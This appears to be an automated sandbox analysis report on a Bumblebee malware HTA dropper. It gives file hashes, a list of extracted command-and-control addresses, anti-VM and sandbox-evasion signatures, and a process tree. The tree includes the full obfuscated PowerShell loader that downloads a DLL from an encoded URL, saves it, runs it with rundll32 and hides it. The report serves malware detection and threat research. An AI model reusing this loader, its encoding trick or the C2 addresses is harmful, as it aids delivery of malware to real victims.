Analysis
-
max time kernel
90s -
max time network
138s -
platform
windows10-2004_x64 -
resource
win10v2004-20220414-en -
submitted
18/06/2022, 02:48
Static task
static1
General
-
Target
a1756.hta
-
Size
106KB
-
MD5
77e0ff485132eb2eb9f87ad6eab9a503
-
SHA1
46eb0a58f4e0d34649a9bd07a63d0fda8b6cf4a9
-
SHA256
9464c5521abc33590b6388f41d53d306f33c8e6a4b20358155a3cbfbdf31b0ff
-
SHA512
8fd76911715e85adc2335f0daa8ce8a916823a369056d860d56e5eb188faca5dfe0b6a6fbf545384dce7fd4b54971f754d076cdc1386a440f42ec05c64713d06
Malware Config
Extracted
bumblebee
a17
220.111.119.123:476
90.12.112.169:180
146.70.124.116:443
47.27.63.45:115
77.45.24.148:444
11.1.201.27:344
224.200.37.92:481
103.175.16.38:443
188.8.220.88:269
12.202.229.195:440
41.56.181.200:486
173.171.60.50:394
5.152.80.211:121
88.158.143.245:189
57.242.85.233:131
30.205.76.70:490
45.138.172.246:443
213.226.100.95:443
46.44.240.53:361
151.75.118.144:368
124.77.203.104:343
12.115.36.174:276
239.245.67.55:401
102.51.3.25:432
64.131.183.17:402
246.126.195.66:313
185.62.56.181:443
207.159.38.174:412
171.175.237.53:349
53.74.73.76:297
93.61.106.53:231
243.29.153.81:270
175.187.178.6:302
207.185.174.1:240
251.170.118.186:302
183.90.191.234:276
228.27.113.15:219
83.183.152.159:280
85.239.33.172:443
6.249.22.42:129
45.147.229.199:443
202.123.74.131:227
55.119.41.81:187
14.7.69.141:109
184.198.223.201:113
194.123.215.252:114
73.235.164.95:474
Signatures
-
Enumerates VirtualBox registry keys 2 TTPs 5 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VBoxGuest rundll32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VBoxMouse rundll32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VBoxService rundll32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VBoxSF rundll32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VBoxVideo rundll32.exe -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\FADT\VBOX__ rundll32.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\RSDT\VBOX__ rundll32.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rundll32.exe -
Looks for VirtualBox Guest Additions in registry 2 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\Oracle\VirtualBox Guest Additions rundll32.exe -
Blocklisted process makes network request 1 IoCs
flow pid Process 11 1604 powershell.exe -
Downloads MZ/PE file
-
Checks BIOS information in registry 2 TTPs 3 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate rundll32.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000\Control Panel\International\Geo\Nation mshta.exe -
Identifies Wine through registry keys 2 TTPs 1 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000\SOFTWARE\Wine rundll32.exe -
Loads dropped DLL 2 IoCs
pid Process 4692 rundll32.exe 204 rundll32.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000_Classes\Local Settings powershell.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 1604 powershell.exe 1604 powershell.exe 204 rundll32.exe 204 rundll32.exe 204 rundll32.exe 204 rundll32.exe 204 rundll32.exe 204 rundll32.exe 204 rundll32.exe 204 rundll32.exe 204 rundll32.exe 204 rundll32.exe 204 rundll32.exe 204 rundll32.exe 204 rundll32.exe 204 rundll32.exe 204 rundll32.exe 204 rundll32.exe 204 rundll32.exe 204 rundll32.exe 204 rundll32.exe 204 rundll32.exe 204 rundll32.exe 204 rundll32.exe 204 rundll32.exe 204 rundll32.exe 204 rundll32.exe 204 rundll32.exe 204 rundll32.exe 204 rundll32.exe 204 rundll32.exe 204 rundll32.exe 204 rundll32.exe 204 rundll32.exe 204 rundll32.exe 204 rundll32.exe 204 rundll32.exe 204 rundll32.exe 204 rundll32.exe 204 rundll32.exe 204 rundll32.exe 204 rundll32.exe 204 rundll32.exe 204 rundll32.exe 204 rundll32.exe 204 rundll32.exe 204 rundll32.exe 204 rundll32.exe 204 rundll32.exe 204 rundll32.exe 204 rundll32.exe 204 rundll32.exe 204 rundll32.exe 204 rundll32.exe 204 rundll32.exe 204 rundll32.exe 204 rundll32.exe 204 rundll32.exe 204 rundll32.exe 204 rundll32.exe 204 rundll32.exe 204 rundll32.exe 204 rundll32.exe 204 rundll32.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 1604 powershell.exe -
Suspicious use of WriteProcessMemory 8 IoCs
description pid Process procid_target PID 3148 wrote to memory of 1604 3148 mshta.exe 79 PID 3148 wrote to memory of 1604 3148 mshta.exe 79 PID 3148 wrote to memory of 1604 3148 mshta.exe 79 PID 1604 wrote to memory of 4692 1604 powershell.exe 86 PID 1604 wrote to memory of 4692 1604 powershell.exe 86 PID 1604 wrote to memory of 4692 1604 powershell.exe 86 PID 4692 wrote to memory of 204 4692 rundll32.exe 87 PID 4692 wrote to memory of 204 4692 rundll32.exe 87
Processes
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\a1756.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3148 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function sfNLCqnFiKI($KuRdwWHKWxHdO, $zhZaIagMAJgckCPl){[IO.File]::WriteAllBytes($KuRdwWHKWxHdO, $zhZaIagMAJgckCPl)};function ENqKnJXwBLF($KuRdwWHKWxHdO){if($KuRdwWHKWxHdO.EndsWith((wUVPkCyLVQNxHewJ @(49750,49804,49812,49812))) -eq $True){Start-Process (wUVPkCyLVQNxHewJ @(rundll32.exe $KuRdwWHKWxHdO ,TSErsNqyhR ))}elseif($KuRdwWHKWxHdO.EndsWith((wUVPkCyLVQNxHewJ @(49750,49816,49819,49753))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $KuRdwWHKWxHdO}else{Start-Process $KuRdwWHKWxHdO}};function VduyWaaEzCowZqsK($sfNLCqnFiKI){$CnUBFBrqJLbRiaoDEbam=(wUVPkCyLVQNxHewJ @(49776,49809,49804,49804,49805,49814));$lJvVeRQIpM=(Get-ChildItem $sfNLCqnFiKI -Force);$lJvVeRQIpM.Attributes=$lJvVeRQIpM.Attributes -bor ([IO.FileAttributes]$CnUBFBrqJLbRiaoDEbam).value__};function lkBLTsYSkQTbqJd($YwVjretvalrtU){$qPifrzmLAAlEvDf = New-Object (wUVPkCyLVQNxHewJ @(49782,49805,49820,49750,49791,49805,49802,49771,49812,49809,49805,49814,49820));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$zhZaIagMAJgckCPl = $qPifrzmLAAlEvDf.DownloadData($YwVjretvalrtU);return $zhZaIagMAJgckCPl};function wUVPkCyLVQNxHewJ($UiXVLnoBl){$uEerpbacyEbUh=49704;$njqXRYwkfwbNa=$Null;foreach($rNVhgBOwkmUuWZZJ in $UiXVLnoBl){$njqXRYwkfwbNa+=[char]($rNVhgBOwkmUuWZZJ-$uEerpbacyEbUh)};return $njqXRYwkfwbNa};function FrbLmunfo(){$WQEBPIDdOjMGRXZFkDx = $env:AppData + '\';;$kxwmFjghiTbUgbMp = $WQEBPIDdOjMGRXZFkDx + '';If(Test-Path -Path $kxwmFjghiTbUgbMp){Invoke-Item $kxwmFjghiTbUgbMp;}Else{ $nQYMowphSEMmJKYm = lkBLTsYSkQTbqJd (wUVPkCyLVQNxHewJ @(49808,49820,49820,49816,49819,49762,49751,49751));sfNLCqnFiKI $kxwmFjghiTbUgbMp $nQYMowphSEMmJKYm;Invoke-Item $kxwmFjghiTbUgbMp;}$vDgGPDZSeuD = $WQEBPIDdOjMGRXZFkDx + 'a17_cr56.dll'; if (Test-Path -Path $vDgGPDZSeuD){ENqKnJXwBLF $vDgGPDZSeuD;}Else{ $JzsoBTlTsXDwi = lkBLTsYSkQTbqJd (wUVPkCyLVQNxHewJ @(49808,49820,49820,49816,49819,49762,49751,49751,49816,49809,49804,49809,49816,49821,49818,49805,49822,49750,49803,49815,49813,49751,49801,49753,49759,49799,49803,49818,49757,49758,49750,49804,49812,49812));sfNLCqnFiKI $vDgGPDZSeuD $JzsoBTlTsXDwi;ENqKnJXwBLF $vDgGPDZSeuD;};VduyWaaEzCowZqsK $vDgGPDZSeuD;;;;;}FrbLmunfo;2⤵
- Blocklisted process makes network request
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1604 -
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\system32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a17_cr56.dll TSErsNqyhR3⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:4692 -
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a17_cr56.dll TSErsNqyhR4⤵
- Enumerates VirtualBox registry keys
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Looks for VirtualBox Guest Additions in registry
- Checks BIOS information in registry
- Identifies Wine through registry keys
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
PID:204
-
-
-
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:1756
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1.6MB
MD52ca8831a93e019d17aa20a57f181c9af
SHA167e22e6228a98d188f52da56bcddad4be4241f8d
SHA2564e1c8820612a384232f70e396d5ba17a7d75daa33adabf49f730bf449d606969
SHA512931d26761f9b7cfae025d1b672a60eb28ad843986025cb59f73143ea03fa1a48705f8c4e3e3178552e5b3b06989a841b3f77c71eb98261bd1a2925bd1b97e7db
-
Filesize
1.6MB
MD52ca8831a93e019d17aa20a57f181c9af
SHA167e22e6228a98d188f52da56bcddad4be4241f8d
SHA2564e1c8820612a384232f70e396d5ba17a7d75daa33adabf49f730bf449d606969
SHA512931d26761f9b7cfae025d1b672a60eb28ad843986025cb59f73143ea03fa1a48705f8c4e3e3178552e5b3b06989a841b3f77c71eb98261bd1a2925bd1b97e7db
-
Filesize
1.6MB
MD52ca8831a93e019d17aa20a57f181c9af
SHA167e22e6228a98d188f52da56bcddad4be4241f8d
SHA2564e1c8820612a384232f70e396d5ba17a7d75daa33adabf49f730bf449d606969
SHA512931d26761f9b7cfae025d1b672a60eb28ad843986025cb59f73143ea03fa1a48705f8c4e3e3178552e5b3b06989a841b3f77c71eb98261bd1a2925bd1b97e7db